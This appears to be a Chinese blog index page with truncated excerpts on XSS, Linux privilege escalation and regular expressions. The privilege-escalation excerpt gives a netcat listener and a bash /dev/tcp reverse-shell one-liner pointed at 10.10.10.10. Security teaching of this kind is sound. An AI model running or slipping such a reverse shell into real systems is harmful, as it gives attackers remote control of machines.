摘要：xss（跨站脚本攻击）xss是指攻击者在网页中嵌入客户端脚本，通常是javascript编写的恶意代码，当用户使用浏览器浏览被嵌入恶意代码的网页时，恶意代码将在用户的浏览器上被解析执行。重点是“脚本”这两个字，脚本主要有javascript和actionscript。要想深入的研究xss，必须要精通 阅读全文

摘要： 阅读全文

摘要：Linux下的漏洞提权 linux下一般都是系统漏洞提权，分为以下几个步骤： 提权 反弹shell 本地：nc -l -p 8000 目标机器：/bin/bash -i >& /dev/tcp/10.10.10.10/8000 0>&1 实例 1、得到系统版本号 centos 7 local roo 阅读全文

摘要：正则表达式 字符串是编程时涉及到的最多的一种数据结构，对字符串进行操作的需求几乎无处不在。比如判断一个字符串是否是合法的Email地址，虽然可以编程提取@前后的子串，再分别判断是否是但粗和域名，但这样做不但麻烦，而且代码难以复用。 正则表达式是一种用来匹配字符串的强有力的武器。它的设计思想是用一种描 阅读全文